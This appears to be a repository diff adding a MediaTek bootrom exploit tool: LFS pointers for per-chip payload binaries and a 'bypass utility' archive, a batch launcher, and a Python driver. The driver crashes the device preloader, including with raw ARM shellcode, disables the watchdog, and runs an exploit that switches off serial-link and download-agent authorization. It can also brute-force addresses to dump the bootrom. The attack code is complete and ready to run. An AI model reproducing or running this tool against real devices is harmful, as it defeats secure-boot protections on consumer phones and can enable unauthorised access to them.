|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:450676f55daf21f1f6e1c733fa6d8c31b0d2b88598f203fc1e1a5282ffc4995e
|
3 |
+
size 600
|
exploits_collection/payloads/mt8167_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:ad6bf2b8f10554671715cc1fd27dcae86f6608d6af86b0686c7c5b9669b19a51
|
3 |
+
size 612
|
exploits_collection/payloads/mt8173_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:bc65b5184d97098cafcc431454e0549bbdb8e7d5b4f6148800c46343c218faf6
|
3 |
+
size 600
|
exploits_collection/payloads/mt8590_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:2d5fcc0f926684beb5c9558beecf29ac0f9b1244fdc701fee7ad0a6af3de39c8
|
3 |
+
size 600
|
exploits_collection/payloads/mt8695_payload.bin
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:01653e6daf12d14014a2d3cae9fc2cab8afb34727228197fba09fce70eca035a
|
3 |
+
size 592
|
libusb-1.0.dll
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:6b24b0ee1a59cbae385dd15b06eddf2c72b2ff3a875ae279883a880136c59ec8
|
3 |
+
size 166912
|
main.py
ADDED
@@ -0,0 +1,237 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
#!/bin/python3
|
2 |
+
|
3 |
+
from src.exploit import exploit
|
4 |
+
from src.common import from_bytes, to_bytes
|
5 |
+
from src.config import Config
|
6 |
+
from src.device import Device
|
7 |
+
from src.logger import log
|
8 |
+
from src.bruteforce import bruteforce
|
9 |
+
|
10 |
+
import argparse
|
11 |
+
import os
|
12 |
+
|
13 |
+
DEFAULT_CONFIG = "exploits_collection/default_config.json5"
|
14 |
+
PAYLOAD_DIR = "exploits_collection/payloads/"
|
15 |
+
DEFAULT_PAYLOAD = "generic_dump_payload.bin"
|
16 |
+
DEFAULT_DA_ADDRESS = 0x200D00
|
17 |
+
|
18 |
+
|
19 |
+
def main():
|
20 |
+
parser = argparse.ArgumentParser()
|
21 |
+
parser.add_argument("-c", "--config", help="Device config")
|
22 |
+
parser.add_argument("-t", "--test", help="Testmode", const="0x9900", nargs='?')
|
23 |
+
parser.add_argument("-w", "--watchdog", help="Watchdog address(in hex)")
|
24 |
+
parser.add_argument("-u", "--uart", help="UART base address(in hex)")
|
25 |
+
parser.add_argument("-v", "--var_1", help="var_1 value(in hex)")
|
26 |
+
parser.add_argument("-a", "--payload_address", help="payload_address value(in hex)")
|
27 |
+
parser.add_argument("-p", "--payload", help="Payload to use")
|
28 |
+
parser.add_argument("-f", "--force", help="Force exploit on insecure device", action="store_true")
|
29 |
+
parser.add_argument("-n", "--no_handshake", help="Skip handshake", action="store_true")
|
30 |
+
parser.add_argument("-m", "--crash_method", help="Method to use for crashing preloader (0, 1, 2)", type=int)
|
31 |
+
parser.add_argument("-k", "--kamakiri", help="Force use of kamakiri", action="store_true")
|
32 |
+
arguments = parser.parse_args()
|
33 |
+
|
34 |
+
if arguments.config:
|
35 |
+
if not os.path.exists(arguments.config):
|
36 |
+
raise RuntimeError("Config file {} doesn't exist".format(arguments.config))
|
37 |
+
elif not os.path.exists(DEFAULT_CONFIG):
|
38 |
+
raise RuntimeError("Default config is missing")
|
39 |
+
|
40 |
+
device = Device().find()
|
41 |
+
|
42 |
+
config, serial_link_authorization, download_agent_authorization, hw_code = get_device_info(device, arguments)
|
43 |
+
|
44 |
+
while device.preloader:
|
45 |
+
device = crash_preloader(device, config)
|
46 |
+
config, serial_link_authorization, download_agent_authorization, hw_code = get_device_info(device, arguments)
|
47 |
+
|
48 |
+
log("Disabling watchdog timer")
|
49 |
+
device.write32(config.watchdog_address, 0x22000064)
|
50 |
+
|
51 |
+
if device.libusb0:
|
52 |
+
arguments.kamakiri = True
|
53 |
+
|
54 |
+
bootrom__name = "bootrom_" + hex(hw_code)[2:] + ".bin"
|
55 |
+
|
56 |
+
if arguments.test and not arguments.kamakiri:
|
57 |
+
dump_ptr = int(arguments.test, 16)
|
58 |
+
found = False
|
59 |
+
while not found:
|
60 |
+
log("Test mode, testing " + hex(dump_ptr) + "...")
|
61 |
+
found, dump_ptr = bruteforce(device, config, dump_ptr)
|
62 |
+
device.dev.close()
|
63 |
+
reconnect_message()
|
64 |
+
device = Device().find(wait=True)
|
65 |
+
device.handshake()
|
66 |
+
while device.preloader:
|
67 |
+
device = crash_preloader(device, config)
|
68 |
+
device.handshake()
|
69 |
+
log("Found " + hex(dump_ptr) + ", dumping bootrom to {}".format(bootrom__name))
|
70 |
+
open(bootrom__name, "wb").write(bruteforce(device, config, dump_ptr, True))
|
71 |
+
exit(0)
|
72 |
+
|
73 |
+
if serial_link_authorization or download_agent_authorization or arguments.force:
|
74 |
+
log("Disabling protection")
|
75 |
+
|
76 |
+
payload = prepare_payload(config)
|
77 |
+
|
78 |
+
result = exploit(device, config, payload, arguments)
|
79 |
+
if arguments.test:
|
80 |
+
while not result:
|
81 |
+
device.dev.close()
|
82 |
+
config.var_1 += 1
|
83 |
+
log("Test mode, testing " + hex(config.var_1) + "...")
|
84 |
+
reconnect_message()
|
85 |
+
device = Device().find(wait=True)
|
86 |
+
device.handshake()
|
87 |
+
while device.preloader:
|
88 |
+
device = crash_preloader(device, config)
|
89 |
+
device.handshake()
|
90 |
+
result = exploit(device, config, payload, arguments)
|
91 |
+
else:
|
92 |
+
log("Insecure device, sending payload using send_da")
|
93 |
+
|
94 |
+
if not arguments.payload:
|
95 |
+
config.payload = DEFAULT_PAYLOAD
|
96 |
+
if not arguments.payload_address:
|
97 |
+
config.payload_address = DEFAULT_DA_ADDRESS
|
98 |
+
|
99 |
+
payload = prepare_payload(config)
|
100 |
+
|
101 |
+
payload += b'\x00' * 0x100
|
102 |
+
|
103 |
+
device.send_da(config.payload_address, len(payload), 0x100, payload)
|
104 |
+
device.jump_da(config.payload_address)
|
105 |
+
|
106 |
+
result = device.read(4)
|
107 |
+
|
108 |
+
if result == to_bytes(0xA1A2A3A4, 4):
|
109 |
+
log("Protection disabled")
|
110 |
+
elif result == to_bytes(0xC1C2C3C4, 4):
|
111 |
+
dump_brom(device, bootrom__name)
|
112 |
+
elif result == to_bytes(0x0000C1C2, 4) and device.read(4) == to_bytes(0xC1C2C3C4, 4):
|
113 |
+
dump_brom(device, bootrom__name, True)
|
114 |
+
elif result != b'':
|
115 |
+
raise RuntimeError("Unexpected result {}".format(result.hex()))
|
116 |
+
else:
|
117 |
+
log("Payload did not reply")
|
118 |
+
|
119 |
+
device.close()
|
120 |
+
|
121 |
+
def reconnect_message():
|
122 |
+
print("")
|
123 |
+
print("Please reconnect device in bootrom mode")
|
124 |
+
print("")
|
125 |
+
|
126 |
+
def dump_brom(device, bootrom__name, word_mode=False):
|
127 |
+
log("Found send_dword, dumping bootrom to {}".format(bootrom__name))
|
128 |
+
|
129 |
+
with open(bootrom__name, "wb") as bootrom:
|
130 |
+
if word_mode:
|
131 |
+
for i in range(0x20000 // 4):
|
132 |
+
device.read(4) # discard garbage
|
133 |
+
bootrom.write(device.read(4))
|
134 |
+
else:
|
135 |
+
bootrom.write(device.read(0x20000))
|
136 |
+
|
137 |
+
|
138 |
+
def prepare_payload(config):
|
139 |
+
with open(PAYLOAD_DIR + config.payload, "rb") as payload:
|
140 |
+
payload = payload.read()
|
141 |
+
|
142 |
+
# replace watchdog_address and uart_base in generic payload
|
143 |
+
payload = bytearray(payload)
|
144 |
+
if from_bytes(payload[-4:], 4, '<') == 0x10007000:
|
145 |
+
payload[-4:] = to_bytes(config.watchdog_address, 4, '<')
|
146 |
+
if from_bytes(payload[-8:][:4], 4, '<') == 0x11002000:
|
147 |
+
payload[-8:] = to_bytes(config.uart_base, 4, '<') + payload[-4:]
|
148 |
+
payload = bytes(payload)
|
149 |
+
|
150 |
+
while len(payload) % 4 != 0:
|
151 |
+
payload += to_bytes(0)
|
152 |
+
|
153 |
+
return payload
|
154 |
+
|
155 |
+
|
156 |
+
def get_device_info(device, arguments):
|
157 |
+
if not arguments.no_handshake:
|
158 |
+
device.handshake()
|
159 |
+
|
160 |
+
hw_code = device.get_hw_code()
|
161 |
+
hw_sub_code, hw_ver, sw_ver = device.get_hw_dict()
|
162 |
+
secure_boot, serial_link_authorization, download_agent_authorization = device.get_target_config()
|
163 |
+
|
164 |
+
if arguments.config:
|
165 |
+
config_file = open(arguments.config)
|
166 |
+
config = Config().from_file(config_file, hw_code)
|
167 |
+
config_file.close()
|
168 |
+
else:
|
169 |
+
try:
|
170 |
+
config = Config().default(hw_code)
|
171 |
+
except NotImplementedError as e:
|
172 |
+
if arguments.test:
|
173 |
+
config = Config()
|
174 |
+
|
175 |
+
log(e)
|
176 |
+
else:
|
177 |
+
raise e
|
178 |
+
|
179 |
+
if arguments.test:
|
180 |
+
config.payload = DEFAULT_PAYLOAD
|
181 |
+
if arguments.var_1:
|
182 |
+
config.var_1 = int(arguments.var_1, 16)
|
183 |
+
if arguments.watchdog:
|
184 |
+
config.watchdog_address = int(arguments.watchdog, 16)
|
185 |
+
if arguments.uart:
|
186 |
+
config.uart_base = int(arguments.uart, 16)
|
187 |
+
if arguments.payload_address:
|
188 |
+
config.payload_address = int(arguments.payload_address, 16)
|
189 |
+
if arguments.payload:
|
190 |
+
config.payload = arguments.payload
|
191 |
+
if arguments.crash_method:
|
192 |
+
config.crash_method = arguments.crash_method
|
193 |
+
|
194 |
+
|
195 |
+
if not os.path.exists(PAYLOAD_DIR + config.payload):
|
196 |
+
raise RuntimeError("Payload file {} doesn't exist".format(PAYLOAD_DIR + config.payload))
|
197 |
+
|
198 |
+
print()
|
199 |
+
log("Device hw code: {}".format(hex(hw_code)))
|
200 |
+
log("Device hw sub code: {}".format(hex(hw_sub_code)))
|
201 |
+
log("Device hw version: {}".format(hex(hw_ver)))
|
202 |
+
log("Device sw version: {}".format(hex(sw_ver)))
|
203 |
+
log("Device secure boot: {}".format(secure_boot))
|
204 |
+
log("Device serial link authorization: {}".format(serial_link_authorization))
|
205 |
+
log("Device download agent authorization: {}".format(download_agent_authorization))
|
206 |
+
print()
|
207 |
+
|
208 |
+
return config, serial_link_authorization, download_agent_authorization, hw_code
|
209 |
+
|
210 |
+
def crash_preloader(device, config):
|
211 |
+
print("")
|
212 |
+
log("Found device in preloader mode, trying to crash...")
|
213 |
+
print("")
|
214 |
+
if config.crash_method == 0:
|
215 |
+
try:
|
216 |
+
payload = b'\x00\x01\x9F\xE5\x10\xFF\x2F\xE1' + b'\x00' * 0x110
|
217 |
+
device.send_da(0, len(payload), 0, payload)
|
218 |
+
device.jump_da(0)
|
219 |
+
except RuntimeError as e:
|
220 |
+
log(e)
|
221 |
+
print("")
|
222 |
+
elif config.crash_method == 1:
|
223 |
+
payload = b'\x00' * 0x100
|
224 |
+
device.send_da(0, len(payload), 0x100, payload)
|
225 |
+
device.jump_da(0)
|
226 |
+
elif config.crash_method == 2:
|
227 |
+
device.read32(0)
|
228 |
+
|
229 |
+
device.dev.close()
|
230 |
+
|
231 |
+
device = Device().find()
|
232 |
+
|
233 |
+
return device
|
234 |
+
|
235 |
+
|
236 |
+
if __name__ == "__main__":
|
237 |
+
main()
|
mtk-bypass-utility.zip
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:d9f0a86c19b91f38cd8e64522fc8b550b3a750120902838a247a50350bd60d8b
|
3 |
+
size 6426596
|
mtk_bypass.bat
ADDED
@@ -0,0 +1 @@
|
|
|
|
|
1 |
+
start cmd /k "python main.py"
|